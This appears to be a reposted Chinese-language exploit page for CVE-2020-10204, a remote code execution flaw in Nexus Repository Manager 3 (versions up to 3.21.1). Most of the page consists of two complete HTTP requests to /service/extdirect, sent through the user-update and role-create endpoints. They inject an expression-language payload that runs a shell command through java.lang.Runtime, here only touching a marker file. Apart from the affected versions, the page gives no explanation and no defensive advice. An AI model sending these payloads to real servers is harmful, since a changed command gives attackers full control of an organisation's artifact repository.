CVE-2020-10204 Nexus Repository Manager 3 RCE-棉花糖会员站

## CVE-2020-10204 Nexus Repository Manager 3 RCE

**影响版本**：

– <= 3.21.1 Affected Versions: All previous Nexus Repository Manager 3.x OSS/Pro versions up to and including 3.21.1 - Fixed in Version: Nexus Repository Manager OSS/Pro version 3.21.2 **前提:** 登陆任何一个账号 **>> 调用更新 role 接口**

1. 利用更新用户接口：

“`http
POST /service/extdirect HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 301
accept: application/json
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.16936373694860252
Content-Type: application/json
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/swagger-ui/?_v=3.21.1-01&_e=OSS
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.16936373694860252; NXSESSIONID=4e5437b3-7755-4784-bda6-d004e8f589fb
Connection: close

{“action”:”coreui_User”,”method”:”update”,”data”:[{“userId”:”www”,”version”:”2″,”firstName”:”www”,”lastName”:”www”,”email”:”www@qq.com”,”status”:”active”,”roles”:[“$\\A{”.getClass().forName(‘java.lang.Runtime’).getMethods()[6].invoke(null).exec(‘touch /tmp/cve-2020-10204’)}”]}],”type”:”rpc”,”tid”:9}
“`

2. 利用创建角色接口:

“`http
POST /service/extdirect HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 294
accept: application/json
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.856555763510765
Content-Type: application/json
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/swagger-ui/?_v=3.21.1-01&_e=OSS
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.856555763510765; NXSESSIONID=da418706-f4e4-468e-93ac-de9c46802f11
Connection: close

{“action”:”coreui_Role”,”method”:”create”,”data”:[{“version”:””,”source”:”default”,”id”:”1111″,”name”:”2222″,”description”:”3333″,”privileges”:[“$\\A{”.getClass().forName(‘java.lang.Runtime’).getMethods()[6].invoke(null).exec(‘touch /tmp/cve-2020-10204’)}”],”roles”:[]}],”type”:”rpc”,”tid”:89}
“`

> [@threedr3am](https://github.com/threedr3am/learnjavabug/tree/master/nexus/CVE-2020-10204)

文章版权归作者所有，未经允许请勿转载。

THE END